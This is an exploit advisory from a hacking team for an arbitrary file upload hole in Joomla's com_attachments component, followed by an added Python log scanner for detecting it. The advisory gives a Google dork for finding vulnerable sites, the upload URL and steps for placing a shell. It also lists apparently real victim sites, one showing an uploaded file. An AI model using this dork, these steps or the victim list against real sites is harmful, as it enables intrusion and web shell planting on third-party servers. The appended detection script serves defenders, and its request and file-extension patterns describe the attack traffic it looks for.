Joomla Attachments Shell Upload

2013.07.10
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################
# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:"index.php?option=com_attachments"
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Lin
################################################
# ~> ExpLoit <~
#
# http://target/index.php?option=com_attachments&task=upload
#
# 1. Upload Your File . !
# 2. Find Your File in This Path:
# http://target/attachments/article
# 3. End :P
#
############################################
# ~> DeMo <~
# http://www.iwalkforXlife.com/index.php?option=com_attachments&task=upload
# http://www.iwalkXforlife.com/attachments/article/0/stars.jpg
# ----
# http://www.lgbXsychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.saiXs-club.net/index.php?option=com_attachments&task=upload
# http://www.projXt-establis.eu/index.php?option=com_attachments&task=upload
############################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X
# Fuck All Lammer in Cyber :P
###########################################

References:

http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
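
For defenders checking whether a site running this component has seen the request pattern described above, the following added example (not part of the original advisory) scans Apache combined-format access logs for POSTs to the `com_attachments` upload task and for requests to script-type files under `/attachments/article/`. The log lines are constructed sample data, and the extension list and function names are assumptions chosen for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jul/2013:10:01:02 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jul/2013:10:02:10 +0000] "POST /index.php?option=com_attachments&task=upload HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [09/Jul/2013:10:02:15 +0000] "GET /attachments/article/0/x.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.4 - - [09/Jul/2013:10:05:00 +0000] "POST /index.php/en/?task=upload&option=com_attachments HTTP/1.1" 200 812 "-" "curl/7.30"
198.51.100.4 - - [09/Jul/2013:10:05:03 +0000] "GET /attachments/article/0/notes.pdf HTTP/1.1" 200 90211 "-" "curl/7.30"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: extensions a web server may pass to an interpreter. The trailing
# (\.|$) also catches double extensions such as name.php.jpg.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|pl|cgi|py|asp|aspx|jsp)(\.|$)', re.I)

def classify(method, target):
    """Return a tag for requests matching the advisory's pattern, else None."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)  # parameter order and path prefix do not matter
    if qs.get("option") == ["com_attachments"] and qs.get("task") == ["upload"]:
        return "upload-post" if method == "POST" else "upload-form"
    if "/attachments/article/" in parts.path.lower():
        if SCRIPT_EXT.search(parts.path.rsplit("/", 1)[-1]):
            return "script-in-attachments"
    return None

def scan(log_text):
    """Yield (ip, tag, target, status) for every flagged log line."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, target, status = m.groups()
        tag = classify(method, target)
        if tag:
            findings.append((ip, tag, target, int(status)))
    return findings

def suspects(findings):
    """Clients that both POSTed an upload and requested a script in the attachments path."""
    tags_by_ip = {}
    for ip, tag, _, _ in findings:
        tags_by_ip.setdefault(ip, set()).add(tag)
    return sorted(ip for ip, tags in tags_by_ip.items()
                  if {"upload-post", "script-in-attachments"} <= tags)

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
    print("correlated clients:", suspects(scan(SAMPLE_LOG)))
```

A hit on `script-in-attachments` with a 200 status is the higher-priority signal, since it indicates the upload directory is serving script-type files at all.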

